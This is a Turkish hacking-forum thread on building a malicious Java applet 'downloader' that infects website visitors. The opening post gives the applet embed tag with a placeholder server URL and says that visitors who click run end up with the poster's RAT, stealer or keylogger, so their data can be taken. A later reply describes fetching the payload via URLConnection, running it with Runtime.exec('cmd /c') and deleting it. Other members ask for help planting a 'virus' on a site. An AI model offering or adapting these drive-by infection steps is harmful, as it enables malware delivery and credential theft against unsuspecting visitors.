jawa dowloader yapma

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

gizemli56

Katılımcı Üye
5 Ara 2009
681
0
Merhabalar,

Arkadaşlar sizler için Java Downloader nedir nasıl kullanılır dökman hazırladım.

Java Downloader Nedir ?

Java downloader bir sitemize xxx.jar java downloader atıp inded'imize applet kodlarını yazıp kaydediyoruz ve siteye giren kişi run deyince server'ımız iniyor ve Kurban'ımız oluyor.

Java downloader applet kodunu nasıl yaparım ?

<applet width='1' height='1' code='JavaUpdater.class' archive='Client.jar'><param name="url" value="server adresiniz"></applet>

Server adres'iniz yerine java xxx.jar dosyasını attınız ardından server'ınızı atmalısınız
ve server uzantınız www.xxxx.xxx/server.exe ola bilir ve index'in üst kısmına kaydediyoruz ve kurban'ımız siteye girdiğinde run basınca dediğim gibi RAT,iStealer,Keylogger'imiza düşüyor ve bilgilerini alıyoruz.
buda video indirme link: https://tik.lat/top9b
ALINTIDIR!!!

TheCasper

Üye
9 May 2011
150
0
kardeş onu yapmak lazım :D eminim sende yapamıyon ondan bişi anlamıyom yapabiliyosan iletşimden eklermisin beni beraber yapalım

TheCasper

Üye
9 May 2011
150
0
o vidioyu izledim arkadaşım bazen yorum olsun diye yorum atıyonuz onda adam sadece virüsü oluşturuyo java çevirme felan onları anlaymıyo parayla satıyom diyo sende beni yiyon burda bilen varmı gerçekten çok lazım

spywaredz

Katılımcı Üye
13 Ağu 2011
610
0
L.A - United States of America

Ahmed

Özel Üye
28 Eyl 2006
437
0
Kendi yazdığım JApplet bir uygulamam var.Çok basit url yi dışardan , .jar dosyamın içerisindeki paketin içerisindeki bir dosyadan alıyor.
URLConnection sınıfı ile url'ye bağlanıp stream açıyorsun.
Daha sonra sistemin ana dizinine yada sen hangi dizine indirmek istersen byte byte yazdırıp o dizinde dosyayı oluşturuyorsun.Runtime.getRuntime().exec("cmd /c " +dosya); ile indirdiğin dosyayı çalıştırıyorsun , ardından o dizinden dosyayı siliyorsun.Bu kadar...
Biraz java.net ve io sınıflarını bilmen yetecektir sana...

TheCasper

Üye
9 May 2011
150
0
Tarantula gerçekten senin dediğini yapmam imkansız bir video yada resim olsa yaparımda anlamadın hiç yapmadığım bişi özelden yardımcı olabilirmisin

Ahmed

Özel Üye
28 Eyl 2006
437
0
Sen java downloader nasıl yaparım demişsin , kodlanan bir programı nasıl kullanırım dememişsin.Yardımcı olurum da java biliyorsan...

Ahmed

Özel Üye
28 Eyl 2006
437
0
Niye direk dosyalarını verip adamın applet bölümündekini kendine göre ayarlamasına izin vermiyorsunki... Bu kolay bişey bunuda yapsın artık...

java downloader istiyorum dememiş , "jawa dowloader nasıl yapabilirim yardımcı olurmusunuz arkadaşlar" , demiş...Nasıl yapılacağını sormuş bende açıkladım...Ayrıca java bilmiyorsa verdiğim açık kaynak kodlu appleti imzalayıp çalıştırması zaten olası değil.

TheCasper

Üye
9 May 2011
150
0
Tarantula kardeş ben java buldum virüsde oluşturdum 2 sini file zillayla attım com.nu dan domain alıp ama hata alıyom aldıgım hata ImageShack® - Online Photo and Video Hosting bu sen haklısın konuyu ilk açtığımda elimde java yoktu java yapmak istiyodum şimdi sende java varsa bana verebilirsen çok süper olur yada teamdan yardım edebilirsen nası yapabilceğimi bilmiyorum :S

https://tik.lat/H0H96 sitede bu girip bakabilirsin hataya ordan

Son düzenleme:

Ahmed

Özel Üye
28 Eyl 2006
437
0
.vbs dosya java ile yakından uzaktan alakası yok.Sanırım sen activex yapmaya çalışıyorsun javascript ile java farklı şeyler..

TheCasper

Üye
9 May 2011
150
0
Tarantula sende java varmı ben derdimi anlatamadım heralde :D ben siteye javalı virüs koycam sende gerekenler varmı acaba java + index vb şeyler ek olarak

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.